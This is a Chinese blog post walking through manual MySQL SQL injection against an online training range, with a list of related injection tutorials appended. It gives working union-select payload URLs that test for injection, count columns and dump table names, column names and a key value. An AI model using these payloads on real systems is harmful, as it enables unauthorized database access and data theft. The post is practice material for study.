1. 程式人生 > >SQL注入實戰————1、MySQL手工注入實戰

SQL注入實戰————1、MySQL手工注入實戰

SQL注入實戰

靶場地址:http://219.153.49.228:48204/show.php?id=MQ==

首先可以看到該URL中存在一個引數“MQ==”,從引數的格式來看是通過了base64進行了加密,那麼我們可以對其進行base64解密

發現解密之後的引數為1,這種型別的注入除了和我們以前的普通注入相比只是多了一個“base64”加密的過程,下面進行手工注入演示:

說明:下面的URL為了讓讀者可以看清,所以沒有進行URL的base64加密,但是讀者在執行前需要對其進行base64加密,之後才可以正常執行!

1、判斷是否可以注入:

單引號測試

and 測試

由上判斷可以得知存在SQL注入

2、猜解欄位長度

order by  2    

order by 3

可以猜到欄位長度為2

3、爆資料庫名、資料庫版本資訊

4、爆表名

http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--

5、爆欄位名

http://219.153.49.228:48204/show.php?id=-1 union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1

6、爆欄位值

http://219.153.49.228:48204/show.php?id=-1 union select thekey,2 from test.data limit 0,1--

至此得到最後的內容!

如有任何疑問,請使用chat快問,掃碼提問!博主閉關階段!

相關推薦

SQL注入實戰————1MySQL手工注入實戰

SQL注入實戰 靶場地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到該URL中存在一個引數“MQ==”,從引數的格式來看是通過了base64進行了加密,那麼我們可以對其進行base64解密 發現解密之後的引

DVWA之php+mysql手工注入

DVWA 頁面 輸入user ID ,輸入 1。看到如下資訊 在此點嘗試注入,輸入‘ ’ ’,判斷其注入型別。 初步判斷是數字型注入,在輸入 " 1 or 1=1 ",嘗試遍歷資料表 判斷字元型:" 1’ or ‘1’='1 " 利用 order b

PHP+MySQL手工注入語句大全 MySQL手工注入語句總結

暴欄位長度 Order by num/* 匹配欄位 and 1=1 union select 1,2,3,4,5…….n/* 暴欄位位置 and 1=2 union select 1,2,3,4,5…..n/* 利用內建函式暴資料庫資訊 version() databas

mysql手工注入演示

演示環境準備: php環境,存在漏洞的php指令碼,mysql資料庫以及資料表 php環境直接使用phpstudy即可 存在漏洞的指令碼檔案    <!DOCTYPE html> <html> <head> &l

mysql手工注入總結

mysql的注入,關鍵是要找到注入點,對注入點進行處理,該閉合的引號,括號等要先進行閉合,然後註釋掉多餘的語句 一、稍微總結下幾種閉合方法: 一般來說,程式設計師在書寫select語句時,會對傳入的變數進行一些處理,常見的有如下幾種,這裡以php為例,假設傳輸進來的變數為

MySQL手工注入步驟+直接寫入一句話

(1)判斷注入點 接著通過and 1=1 和 and 1=2測試發現前者正常,後者異常,可以肯定存在注入點,接下來判斷該頁面查詢資料庫的欄位 (2)查詢欄位數 http://unisscan.cn/list.php?lei=246 order by n--

SQL注入系列之PHP+Mysql手動注入(一)----數字型

1.常見的幾種SQL注入 1.數字型 2.字元型 3.文字型 4.搜尋型(POST/GET) 5.cookie注入 6.SQL盲注 7.編碼注入 8.寬位元組注入 2.測試原始碼 頁面原

MySQL手工注入進階篇——突破過濾危險字元問題

當我們在進行手工注入時,有時候會發現咱們構造的危險字元被過濾了,接下來,我就教大家如何解決這個問題。下面是我的實戰過程。這裡使用的是墨者學院的線上靶場。咱們直接開始。 第一步,判斷注入點。 通過測試發現,這裡過濾了空格和等於號。所以咱們用/**/代替空格,用like代替=,最後將構造的語句進行url編碼,使用

44mysql主從複製實戰

主從複製的配置 軟體版本 1.雙方的MySQL要一致 2.如果不一致:主的要低於從的 從哪兒開始複製: 1.都從0開始 2.主伺服器已經執行一段時間,並且存在不小的資料集:把主伺服器備份,然後在從伺服器恢復,從主伺服器上備份處的位置開始複製 配置過程: 主伺服器: 1.改s

1mysql登入退出重啟密碼檢視修改等資料庫基礎操作

1 工作環境 cmd命令視窗 2 登入: mysql -hlocalhost -uroot -p 3 退出   exit 4 關閉和重新資料庫(需要退出資料庫環境) net stop mysql net start mysql 5 密碼檢視 select

Spring 依賴注入1)訪問器注入

例子: Spring中: <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:mvc="h

1MySQL 8.0參考手冊

本章通過展示如何使用mysql客戶端程式來建立和使用簡單的資料庫,提供了MySQL的教程介紹。mysql(有時稱為“ 終端監視器 ”或 “ 監視器 ”)是一種互動式程式,可讓您連線到MySQL伺服器,執行查詢並檢視結果。 mysql也可以用於批處理模式:事先將查詢放入檔案中,

python資料探勘與分析實戰123

一、資料探勘的建模過程: 1.1定義挖掘目標: 1.1.1動態的菜品推薦 1.1.2客戶進行細分,關注最有價值的客戶 1.1.3基於菜品的歷史銷售情況,對菜品銷量進行預測,預備原材料 1.1.4基於大

Windows提權實戰——————1IIS6.exe提權實戰

前言本次iis6.exe提權是利用iis6.0遠端程式碼執行漏洞獲取到一個Meterpreter之後,進行的提權操作。一切的提權都是基於一個webshell之後進行的後滲透測試,所以不論你的環境如何,只有你有一個WEBshell,之後你就可以進行相應的提權操作,但是對於IIS

墨者學院 - SQL過濾字元後手工注入漏洞測試(第1題)

一開始怎麼加字元都不行,才發現應該是檢測到我注入以後跳轉了; (過濾了空格和一些常規查詢字元,“+”號也過濾了,大小寫不能繞過那就URL編碼吧) 和以往的套路一樣,猜得到欄位是4個。。。 http://219.153.49.228:44375/new_list.php?id=-1/*

SQL注入技巧拓展】————5MySQL盲注淺析

前言 所有的測試均為無WAF的情況下進行。 註釋關鍵字 -- # 單行註釋,兩個-連線符後面緊跟著一個空格 # # 單行註釋 /**/ # 多行註釋 實踐效果: mysql> SELECT username,password FR

SQL注入技巧拓展】————2MySQL注入攻擊與防禦

本文主要是做一個Mysql的注入總結,對於Mysql來說利用的方式太過於靈活,這裡總結了一些主流的一些姿勢。 一、注入常用函式與字元 下面幾點是注入中經常會用到的語句 控制語句操作(select, case, if(), ...) 比較操作(=, like, mod()

暑期練習web18:簡單的sql注入1,2(實驗吧)手工注入及sqlmap

目前只會做1和2。。3的話網上查了wp不知道他們sqlmap沒防任何過濾咱們跑出來的。。。等來年長了本事了,一定要自己手工做出來 注入1的話呢,在輸入1’ or ‘1’=’1的時候就發現存在過濾,後來發現是空格被過濾了,所以我們用註釋符/*來替換空格,注入1的

SQL注入中常用的mysql語法

user()返回當前資料庫連線使用的使用者; database()返回當前資料庫連線使用的資料庫; version()返回當前資料庫的版本; concat-ws() 函式可以將這些函式進行組合使用並顯示出來。concat函式中,將其中的引數直接連線起來產生新的字串。而在con

SQL注入——Less-1

                 宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!!!   開啟主頁進入第一關,提示輸入引數id及它的值, 傳入引數